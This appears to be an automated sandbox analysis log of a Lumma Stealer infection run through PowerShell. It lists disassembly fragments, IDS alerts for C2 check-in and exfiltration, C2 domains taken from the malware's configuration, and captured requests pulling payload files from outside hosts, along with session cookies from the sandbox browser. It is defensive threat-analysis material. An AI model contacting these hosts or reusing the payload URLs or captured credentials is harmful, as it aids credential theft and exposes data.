Source: 8.2.powershell.exe.400000.0.raw.unpack	String decryptor: - Screen Resoluton:
Source: 8.2.powershell.exe.400000.0.raw.unpack	String decryptor: - Physical Installed Memory:
Source: 8.2.powershell.exe.400000.0.raw.unpack	String decryptor: Workgroup: -
Source: 8.2.powershell.exe.400000.0.raw.unpack	String decryptor: yJEcaG--singl6

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 8_2_00415799 CryptUnprotectData,

8_2_00415799

Source: unknown	HTTPS traffic detected: 172.67.223.7:443 -> 192.168.11.20:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.37.173:443 -> 192.168.11.20:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.11.20:49776 version: TLS 1.2

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: powershell.exe, 00000006.00000002.57198151277.0000000007590000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000006.00000002.57198151277.0000000007590000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Directory queried: number of queries: 1002

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 06C774CBh	6_2_06C773B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 06C75276h	6_2_06C7520E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 06C75276h	6_2_06C75210
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 06C774CBh	6_2_06C773A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 06C74C29h	6_2_06C74851
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 06C74C29h	6_2_06C74860
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 06C75276h	6_2_06C75416
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 06C774CBh	6_2_06C77574
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]	8_2_00423860
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, ecx	8_2_00438810
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh	8_2_00438810
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh	8_2_00438810
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then test eax, eax	8_2_00438810
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov byte ptr [esi], al	8_2_0042DA53
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [ebx], ax	8_2_0041B2E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]	8_2_00417DEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	8_2_00409580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [ebp+00h], ax	8_2_00409580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then xor edi, edi	8_2_0041759F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	8_2_0043AEC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]	8_2_0043C767
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]	8_2_0041E7C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov esi, eax	8_2_00415799
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	8_2_00415799
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp eax	8_2_0042984F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov byte ptr [edi], al	8_2_0041682D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]	8_2_0041682D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]	8_2_0041682D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [ecx], bp	8_2_0041D83A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then push C0BFD6CCh	8_2_00423086
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then push C0BFD6CCh	8_2_00423086
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	8_2_0042B170
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov eax, dword ptr [esp+00000080h]	8_2_004179C1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h	8_2_0043B1D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ebx, eax	8_2_0043B1D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [ecx], dx	8_2_004291DD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	8_2_004291DD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ebx, eax	8_2_00405990
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ebp, eax	8_2_00405990
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ebx, esi	8_2_00422190
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [ebx], cx	8_2_00422190
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	8_2_00422190
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov byte ptr [edi], cl	8_2_0042CA49
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]	8_2_00416263
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]	8_2_00415220
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then push esi	8_2_00427AD3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov byte ptr [edi], cl	8_2_0042CAD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then push ebx	8_2_0043CA93
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_0041CB40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [esi], cx	8_2_0041CB40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_00428B61
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov byte ptr [edi], cl	8_2_0042CB11
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov byte ptr [edi], cl	8_2_0042CB22
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	8_2_0043F330
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ebx, eax	8_2_0040DBD9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ebx, eax	8_2_0040DBD9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	8_2_00417380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h	8_2_0041D380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp al, 2Eh	8_2_00426B95
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	8_2_00435450
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]	8_2_00417380
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then push 00000000h	8_2_00429C2B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [ecx], dx	8_2_004291DD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-20h]	8_2_004291DD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	8_2_004074F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	8_2_004074F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	8_2_0043ECA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h	8_2_004385E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp eax	8_2_004385E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp dword ptr [0044450Ch]	8_2_00418591
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov eax, dword ptr [ebp-68h]	8_2_00428D93
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov eax, dword ptr [0044473Ch]	8_2_0041C653
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, ebp	8_2_00425E70
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp dword ptr [004455F4h]	8_2_00425E30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then xor byte ptr [esp+eax+17h], al	8_2_00408F50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov byte ptr [edi], bl	8_2_00408F50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	8_2_0042A700
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then lea edx, dword ptr [ecx+01h]	8_2_0040B70C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov byte ptr [esi], al	8_2_0041BF14
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov eax, dword ptr [ebx+edi+44h]	8_2_00419F30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx eax, word ptr [edx]	8_2_004197C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [edi], dx	8_2_004197C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [esi], cx	8_2_004197C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, ebx	8_2_0042DFE9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp ecx	8_2_0040BFFD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]	8_2_0043EFB0

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 35MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.11.20:49757 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49757 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.11.20:49756 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49756 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.11.20:49774 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.11.20:49776 -> 104.21.96.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: surmisehotte.click
Source: Malware configuration extractor	URLs: aspecteirs.lat
Source: Malware configuration extractor	URLs: energyaffai.lat
Source: Malware configuration extractor	URLs: crosshuaht.lat
Source: Malware configuration extractor	URLs: discokeyus.lat
Source: Malware configuration extractor	URLs: grannyejh.lat
Source: Malware configuration extractor	URLs: sustainskelet.lat
Source: Malware configuration extractor	URLs: rapeflowwj.lat
Source: Malware configuration extractor	URLs: necklacebudi.lat

Source: global traffic

HTTP traffic detected: GET /singl6.vsdx HTTP/1.1Host: journal.liveview.pwConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View	IP Address: 172.67.223.7 172.67.223.7
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49756 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49757 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49773 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49775 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49771 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49770 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49772 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49776 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.20:49774 -> 104.21.96.1:443

Source: unknown	TCP traffic detected without corresponding DNS query: 23.50.112.50
Source: unknown	TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown	TCP traffic detected without corresponding DNS query: 23.192.36.227
Source: unknown	TCP traffic detected without corresponding DNS query: 23.192.36.227
Source: unknown	TCP traffic detected without corresponding DNS query: 23.192.36.227
Source: unknown	TCP traffic detected without corresponding DNS query: 23.192.36.227
Source: unknown	TCP traffic detected without corresponding DNS query: 23.192.36.227
Source: unknown	TCP traffic detected without corresponding DNS query: 23.192.36.227
Source: unknown	TCP traffic detected without corresponding DNS query: 23.192.36.227
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.237
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 172.217.165.195
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 172.217.165.195
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	TCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknown	UDP traffic detected without corresponding DNS query: 239.255.255.250
Source: unknown	UDP traffic detected without corresponding DNS query: 239.255.255.250

Source: global traffic	HTTP traffic detected: GET /singl6.mp4 HTTP/1.1Accept: /Accept-Language: en-US,en-GB;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: savecoupons.shopConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /singl6.vsdx HTTP/1.1Host: journal.liveview.pwConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIk6HLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIk6HLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjNGMS_nLsGIjAeKkU8fuiGNfH1GNGe4bKzU792jorXUJawIOeaOJy1_dG9sWahqozDrID_PZwKGOwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjNGMS_nLsGIjA0ik1s4JVq9eOJpsVlOM2gI-DLgMPidfxSgxq5jVmu_BWE0kM6B2QcsTf8YS-EqZsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIk6HLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4BSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu

Source: chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: chrome.exe, 00000009.00000003.57225858403.0000781C03780000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57226031394.0000781C02418000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends CrLitElement{constructor(){super(...arguments);this.url={url:""}}static get is(){return"ntp-doodle-share-dialog"}static get styles(){return getCss$1()}render(){return getHtml$1.bind(this)()}static get properties(){return{title:{type:String},url:{type:Object}}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.fire("share",channel)}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);let instance$2=null;function getCss(){return instance$2\|\|(instance$2=[...[getCss$3()],css`:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px 